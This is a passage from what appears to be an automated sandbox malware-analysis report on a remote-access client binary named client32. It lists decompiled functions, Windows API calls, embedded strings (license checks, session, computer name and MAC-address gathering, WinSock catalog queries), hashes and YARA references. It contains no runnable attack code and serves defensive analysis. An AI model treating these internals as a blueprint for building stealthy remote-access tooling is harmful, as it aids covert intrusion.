                                                                                                            • _strpbrk.LIBCMT ref: 11061469
                                                                                                            • _fgets.LIBCMT ref: 1106156C
                                                                                                            • _strpbrk.LIBCMT ref: 110615E3
                                                                                                            • __wcstoui64.LIBCMT ref: 110615FC
                                                                                                            • _fgets.LIBCMT ref: 11061675
                                                                                                            • _strpbrk.LIBCMT ref: 1106169B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                            • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                            • API String ID: 716802716-1571441106
                                                                                                            • Opcode ID: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
                                                                                                            • Instruction ID: 7d354751decb521dd2b5a9477f267ff04dc70e6f2396a8d0e1f3593140cd268d
                                                                                                            • Opcode Fuzzy Hash: 65d0460f92802e955614a162dd3814ce1d5bf045f2489b592bb5db30f33d702c
                                                                                                            • Instruction Fuzzy Hash: D6A2C275E0465A9FEB10CF64CC40BEFB7B9AF44309F0481D9E949A7280EB71AA45CF61
                                                                                                            Function 1102D560 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1126 1102d560-1102d5b0 call 1110c4b0 1129 1102d5b2-1102d5c6 call 1113ee00 1126->1129 1130 1102d5c8 1126->1130 1132 1102d5ce-1102d613 call 1113e630 call 1113ee60 1129->1132 1130->1132 1138 1102d7b3-1102d7c2 call 11141160 1132->1138 1139 1102d619 1132->1139 1148 1102d7c8-1102d7d8 1138->1148 1140 1102d620-1102d623 1139->1140 1142 1102d625-1102d627 1140->1142 1143 1102d648-1102d651 1140->1143 1145 1102d630-1102d641 1142->1145 1146 1102d657-1102d65e 1143->1146 1147 1102d784-1102d79d call 1113ee60 1143->1147 1145->1145 1149 1102d643 1145->1149 1146->1147 1150 1102d753-1102d768 call 1115f4c7 1146->1150 1151 1102d665-1102d667 1146->1151 1152 1102d76a-1102d77f call 1115f4c7 1146->1152 1153 1102d6fa-1102d72d call 1115dfa1 call 1113e630 1146->1153 1154 1102d73b-1102d751 call 111606a0 1146->1154 1155 1102d6eb-1102d6f5 1146->1155 1156 1102d72f-1102d739 1146->1156 1157 1102d6ac-1102d6b2 1146->1157 1158 1102d6dc-1102d6e6 1146->1158 1147->1140 1177 1102d7a3-1102d7a5 1147->1177 1160 1102d7da 1148->1160 1161 1102d7df-1102d7f3 call 1102c800 1148->1161 1149->1147 1150->1147 1151->1147 1167 1102d66d-1102d6a7 call 1115dfa1 call 1113e630 call 1102c800 1151->1167 1152->1147 1153->1147 1154->1147 1155->1147 1156->1147 1169 1102d6b4-1102d6c8 call 1115f4c7 1157->1169 1170 1102d6cd-1102d6d7 1157->1170 1158->1147 1160->1161 1172 1102d7f8-1102d7fd 1161->1172 1167->1147 1169->1147 1170->1147 1180 1102d8a3-1102d8bd call 11142710 1172->1180 1181 1102d803-1102d828 call 110b69b0 call 11142790 1172->1181 1177->1180 1184 1102d7ab-1102d7b1 1177->1184 1193 1102d913-1102d91f call 1102b0f0 1180->1193 1194 1102d8bf-1102d8d8 call 1105d350 1180->1194 1201 1102d833-1102d839 1181->1201 1202 1102d82a-1102d831 1181->1202 1184->1138 1184->1148 1205 1102d921-1102d928 1193->1205 1206 1102d8f8-1102d8ff 1193->1206 1194->1193 1209 1102d8da-1102d8ec 1194->1209 1207 1102d83b-1102d842 call 110279a0 1201->1207 1208 1102d899 1201->1208 1202->1180 1210 1102d905-1102d908 1205->1210 1212 1102d92a-1102d934 1205->1212 1206->1210 1211 1102db0a-1102db2b GetComputerNameA 1206->1211 1207->1208 1225 1102d844-1102d876 1207->1225 1208->1180 1209->1193 1220 1102d8ee 1209->1220 1214 1102d90a-1102d911 call 110b69b0 1210->1214 1215 1102d939 1210->1215 1217 1102db63-1102db69 1211->1217 1218 1102db2d-1102db61 call 11027870 1211->1218 1212->1211 1224 1102d93c-1102da16 call 110274f0 call 11027820 call 110274f0 * 2 LoadLibraryA GetProcAddress 1214->1224 1215->1224 1222 1102db6b-1102db70 1217->1222 1223 1102db9f-1102dbb2 call 111606a0 1217->1223 1218->1217 1248 1102dbb7-1102dbc3 1218->1248 1220->1206 1229 1102db76-1102db7a 1222->1229 1237 1102dda7-1102ddca 1223->1237 1277 1102dada-1102dae2 SetLastError 1224->1277 1278 1102da1c-1102da33 1224->1278 1239 1102d880-1102d88f call 110f3d00 1225->1239 1240 1102d878-1102d87e 1225->1240 1232 1102db96-1102db98 1229->1232 1233 1102db7c-1102db7e 1229->1233 1244 1102db9b-1102db9d 1232->1244 1242 1102db92-1102db94 1233->1242 1243 1102db80-1102db86 1233->1243 1259 1102ddf2-1102ddfa 1237->1259 1260 1102ddcc-1102ddd2 1237->1260 1246 1102d892-1102d894 call 1102cd90 1239->1246 1240->1239 1240->1246 1242->1244 1243->1232 1249 1102db88-1102db90 1243->1249 1244->1223 1244->1248 1246->1208 1250 1102dbc5-1102dbda call 110b69b0 call 11029840 1248->1250 1251 1102dbdc-1102dbef call 11080b80 1248->1251 1249->1229 1249->1242 1281 1102dc33-1102dc4c call 11080b80 1250->1281 1271 1102dbf1-1102dc14 1251->1271 1272 1102dc16-1102dc18 1251->1272 1261 1102de0c-1102de98 call 1115dfa1 * 2 call 11142790 * 2 GetCurrentProcessId call 110eba70 call 110278d0 call 11142790 call 1115e3e1 1259->1261 1262 1102ddfc-1102de09 call 11035740 call 1115dfa1 1259->1262 1260->1259 1266 1102ddd4-1102dded call 1102cd90 1260->1266 1262->1261 1266->1259 1271->1281 1276 1102dc20-1102dc31 1272->1276 1276->1276 1276->1281 1283 1102daa3-1102daaf 1277->1283 1278->1283 1295 1102da35-1102da3e 1278->1295 1301 1102dc52-1102dccd call 11142790 call 110cd7e0 call 110cf040 call 110b69b0 wsprintfA call 110b69b0 wsprintfA 1281->1301 1302 1102dd8c-1102dd99 call 111606a0 1281->1302 1286 1102daf2-1102db01 1283->1286 1287 1102dab1-1102dabd 1283->1287 1286->1211 1297 1102db03-1102db04 FreeLibrary 1286->1297 1293 1102dacf-1102dad3 1287->1293 1294 1102dabf-1102dacd GetProcAddress 1287->1294 1298 1102dae4-1102dae6 SetLastError 1293->1298 1299 1102dad5-1102dad8 1293->1299 1294->1293 1295->1283 1303 1102da40-1102da76 call 11142790 call 11128460 1295->1303 1297->1211 1307 1102daec 1298->1307 1299->1307 1338 1102dce3-1102dcf9 call 111260b0 1301->1338 1339 1102dccf-1102dcde call 110290c0 1301->1339 1315 1102dd9c-1102dda1 CharUpperA 1302->1315 1303->1283 1323 1102da78-1102da9e call 11142790 call 11027530 1303->1323 1307->1286 1315->1237 1323->1283 1343 1102dd12-1102dd4c call 110ce790 * 2 1338->1343 1344 1102dcfb-1102dd0d call 110ce790 1338->1344 1339->1338 1351 1102dd62-1102dd8a call 111606a0 call 110ce380 1343->1351 1352 1102dd4e-1102dd5d call 110290c0 1343->1352 1344->1343 1351->1315 1352->1351
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _malloc_memsetwsprintf
                                                                                                            • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$11/09/15 09:21:05 V12.10F2$468325$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                            • API String ID: 3802068140-2539462814
                                                                                                            • Opcode ID: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
                                                                                                            • Instruction ID: d240301f554d32d3b7904e5f3cd70c9da08142028b12ad4ce6a05654279abd09
                                                                                                            • Opcode Fuzzy Hash: 4203bcd69c24f794be3a2175e52386947bd84c010198ad05e972880d151edcf0
                                                                                                            • Instruction Fuzzy Hash: B132D675D0026A9FDB12DF94CC84BEDF7B9AB44308F8445E9E958A7280EB706E44CF61
                                                                                                            Function 11131370 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
                                                                                                              • Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
                                                                                                              • Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
                                                                                                              • Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
                                                                                                              • Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
                                                                                                              • Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A
                                                                                                            • AdjustWindowRectEx.USER32(1113DB48,00CE0000,00000001,00000001), ref: 111313B7
                                                                                                            • LoadMenuA.USER32(00000000,000003EC), ref: 111313C8
                                                                                                            • GetSystemMetrics.USER32(00000021), ref: 111313D9
                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 111313E1
                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 111313E7
                                                                                                            • GetDC.USER32(00000000), ref: 111313F3
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111313FE
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 1113140A
                                                                                                            • CreateWindowExA.USER32(00000001,NSMWClass,0237E3F0,00CE0000,80000000,80000000,1113DB48,?,00000000,?,11000000,00000000), ref: 1113145F
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,110F5809,00000001,1113DB48,_debug), ref: 11131467
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                            • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                            • API String ID: 1594747848-1114959992
                                                                                                            • Opcode ID: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                            • Instruction ID: 9cc38207800c48755d7f962ceed396d8e742c52f1043c8e55726c054ea069f44
                                                                                                            • Opcode Fuzzy Hash: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
                                                                                                            • Instruction Fuzzy Hash: 6C31A072E00319AFDB109FE58C84BBFFBB8EB48719F104528FA11B7284D67069408BA5
                                                                                                            Function 1110D180 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                              • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                              • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                            • std::exception::exception.LIBCMT ref: 1110D1EA
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1110D1FF
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1110D216
                                                                                                            • InitializeCriticalSection.KERNEL32(-00000010,?,110309CC,00000001,00000000), ref: 1110D229
                                                                                                            • InitializeCriticalSection.KERNEL32(111EB8A0,?,110309CC,00000001,00000000), ref: 1110D238
                                                                                                            • EnterCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D24C
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,110309CC), ref: 1110D272
                                                                                                            • LeaveCriticalSection.KERNEL32(111EB8A0,?,110309CC), ref: 1110D2FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                            • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                            • API String ID: 1976012330-1024648535
                                                                                                            • Opcode ID: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
                                                                                                            • Instruction ID: 3950031055ca146543af7cdf1b279fa91d633e3444a8efa468e47cc8be7809bd
                                                                                                            • Opcode Fuzzy Hash: 69f2a39a11b822a592fdf9d3d5f92dc8d89bb020cf32c05aff7fb1e321a5611c
                                                                                                            • Instruction Fuzzy Hash: DD41CFB4E01215AFDB12CFA98C84FAEFBF4FB48708F54853AE419D7344E635A5008BA1
                                                                                                            Function 11015220 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 110152DA
                                                                                                            • _memset.LIBCMT ref: 1101531E
                                                                                                            • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015358
                                                                                                            Strings
                                                                                                            • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101525B
                                                                                                            • %012d, xrefs: 110152D4
                                                                                                            • NSLSP, xrefs: 11015368
                                                                                                            • PackedCatalogItem, xrefs: 11015342
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue_memsetwsprintf
                                                                                                            • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                            • API String ID: 1333399081-1346142259
                                                                                                            • Opcode ID: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                            • Instruction ID: bdea00c4cadcb984d55cc41d8ffa963856162fa43bf7957b15c91c952cfd9536
                                                                                                            • Opcode Fuzzy Hash: 1966d73d0a7548c662ec7d0f5b9b12a1528b40116bf1a80f5935ba8defee945b
                                                                                                            • Instruction Fuzzy Hash: 31419071D022299FEB11DB54CC80BEEF7B8EB05318F4441E8E41AA7281EB346B44CF50
                                                                                                            Function 11017550 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101758C
                                                                                                            • CoInitialize.OLE32(00000000), ref: 11017595
                                                                                                            • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 110175BC
                                                                                                            • CoUninitialize.COMBASE ref: 11017620
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                            • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                            • API String ID: 2407233060-578995875
                                                                                                            • Opcode ID: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                            • Instruction ID: f5474d2ce38f90e0a7ff94217669a9bd078e6126dc5b2c5f9befb888d677ae11
                                                                                                            • Opcode Fuzzy Hash: 572f52470f95a4d3f25bfac9a72a5a8fb57ea990918a4877c824122c431ef828
                                                                                                            • Instruction Fuzzy Hash: C1214CB5E006625BDB50CF648C44B6FBBE48F88348F0004B9FC5DDA188FA78D940C792
                                                                                                            Function 110312F0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
